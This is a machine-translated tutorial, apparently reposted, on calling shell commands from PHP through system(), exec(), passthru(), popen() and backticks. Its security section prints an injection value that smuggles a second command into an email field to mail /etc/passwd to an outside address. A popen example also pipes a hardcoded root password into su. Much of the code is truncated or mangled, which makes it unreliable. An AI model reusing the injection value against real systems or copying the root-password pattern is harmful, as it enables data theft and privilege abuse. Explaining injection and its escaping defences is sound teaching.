PHP as a server-side scripting language, like writing simple, or complex dynamic Web pages such a task, it is fully capable. But this is not always the case, sometimes in order to achieve a function, you have to rely on the operating system external programs (or called commands), so you can do more with less.
Difference:
System () outputs and returns the last line of the shell results.
EXEC () does not output results, returns the last line of the shell result, and all results can be saved to a returned array.
PassThru () only invokes the command and outputs the result of the command directly to the standard output device.
Same point: All can get status code of command execution
Demo
////////
PHP as a server-side scripting language, like writing simple, or complex dynamic Web pages such a task, it is fully capable. But this is not always the case, sometimes in order to achieve a function, you have to rely on the operating system external programs (or called commands), so you can do more with less.
So, is it possible to invoke external commands in a PHP script? If so, how do you do it? What are some of the concerns? I'm sure you will be able to answer these questions after reading this article.
Yes? The
answer is yes. PHP, like other programming languages, can invoke external commands entirely within a program, and is simple: just use one or several functions.
Prerequisites
because PHP is basically used for web programming, security is an important aspect of people's thinking. So PHP's designers have added a door to PHP: Safe mode. If running in Safe mode, then the PHP script will be subject to the following four restrictions:
Execute external command
Some restrictions when opening a file;
connecting MySQL database
HTTP-based authentication
in safe mode, only external programs in a particular directory can be executed, and calls to other programs will be rejected. This directory can be specified in the php.ini file with the Safe_mode_exec_dir directive, or in the compiler PHP is added--with-exec-dir option, the default is/usr/local/php/bin.
If you call an external command that you should be able to output (meaning that there is no error in the PHP script), the result is a blank, so it is likely that your network administrator has already run PHP in safe mode.
How do I do it?
calling external commands in PHP can be implemented in the following three ways:
1) with special functions provided by PHP;
PHP provides a total of 3 specialized functions for executing external commands: System (), exec (), PassThru ().
System ()
Prototype: string system (String command [, int return_var])
System () function is similar in other languages, It executes the given command, outputting and returning the result. The second parameter is optional and is used to get the status code after the command executes.
Example:
<? PHP System ("/usr/local/bin/webalizer/webalizer"
EXEC ()
Prototype: string exec (String command [, string array [, int return_var]])
The exec () function, like system (), also executes the given command, but does not output the result, but instead returns the last line of the result. Although it returns only the last line of the command result, the second parameter array gives the complete result by appending the result line to the end of the array. So if the array is not empty, it is best to clear it with unset () before calling it. The third parameter can be used to obtain the status code of the command execution only if the second parameter is specified.
Example:
<? PHP exec ("/bin/ls-l"); EXEC ("/bin/ls-l", $res); EXEC ("/bin/ls-l"
PassThru ()
Prototype: void PassThru (String command [, int return_var])
PassThru () only invokes the command, does not return any results, but outputs the result of the command directly to the standard output device. So the PassThru () function is often used to invoke programs such as Pbmplus (a tool for processing pictures under Unix, a stream of output binary raw images). It can also get the status code of the command execution.
Example:
<? PHP Header ("content-type:image/gif"); PassThru ("./ppmtogif hunte.ppm"
2) Open the process with the Popen () function
The above method can only execute commands simply, but cannot interact with the command. But sometimes you have to enter something into the command, such as when adding Linux system users, to call Su to change the current user to root, and the SU command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above.
The Popen () function opens a process pipeline to execute the given command, returning a file handle. Now that you have returned a file handle, you can read and write to it. In PHP3, the handle can only be done in a single mode of operation, either written or read, and starting from PHP4, you can read and write at the same time. Unless the handle is opened in a pattern (read or write), you must call the Pclose () function to close it.
Example 1:
<? php $fp=popen ("/bin/ls-l""R"
Example 2:
<?PHP/*How to add a system user to PHP below is a routine that adds a user named James, and the root password is verygood. For reference only*/$sucommand="su--login root--command"; $useradd="Useradd"; $rootpasswd="Verygood"; $user="James"; $user _add= sprintf ("%s"%s%s"", $sucommand, $useradd, $user); $FP= @popen ($user _add,"W"); @fputs ($fp, $ROOTPASSWD); @pclose ($FP); ?>
3) Use the anti-apostrophe (', that is, the one below the ESC key on the keyboard, and ~ on the same top)
This method was not previously included in the PHP document, as a trick to exist. The method is simple, use two anti-apostrophes to enclose the command to be executed as an expression, and the value of the expression is the result of the command execution. Such as:
<? php $res='/bin/ls-l'. $res. ' '
The output of this script is like this:
Hunte.gif
hunte.ppm
Jpg.htm
Jpg.jpg
passthru.php
What to think about?
There are two issues to consider: security and timeouts.
Look at security first. For example, you have a small online store, so the list of products you can sell is placed in a file. You write an HTML file with a form, let your users enter their email address, and then send the product list to them. Assuming you're not using PHP's Mail () function (or you've never heard of it), you're going to call the Linux/unix system's mail program to send the file. The program is like this:
<? PHP System ("mail $to < products.txt"" Our catalogue has been sent to your mailbox: $to"
With this code, there is no danger to the average user, but there is actually a very big security hole. If a malicious user enters such an email address:
'--bla; mail [email protected] </etc/passwd; '
Then this command eventually becomes:
' Mail--bla; mail [email protected] </etc/passwd; < Products.txt '
I believe that no matter which network manager sees such an order, it will scare out a cold sweat.
Fortunately, PHP provides us with two functions: Escapeshellcmd () and Escapeshellarg (). The Escapeshellcmd function escapes all characters in a string that may be hidden from the shell and execute another command. These characters have special meanings in the shell, like semicolons (), redirects (>), and reads from files (<). The function escapeshellarg is used to handle the arguments of the command. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a parameter to the command.
Take a look at the timeout problem. If the command to be executed takes a long time, then the command should be placed in the background of the system to run. However, by default, functions like system () wait until the command finishes running before returning (in effect, waiting for the output of the command), which will definitely cause the PHP script to time out. The workaround is to redirect the output of the command to another file or stream, such as:
<? PHP System ("/usr/local/bin/order_proc >/tmp/null &"
I note: Use must pay attention to security issues, in the following I will enumerate some of the relevant PHP code audit
"Go" PHP Execution System external Command systems () EXEC () PassThru ()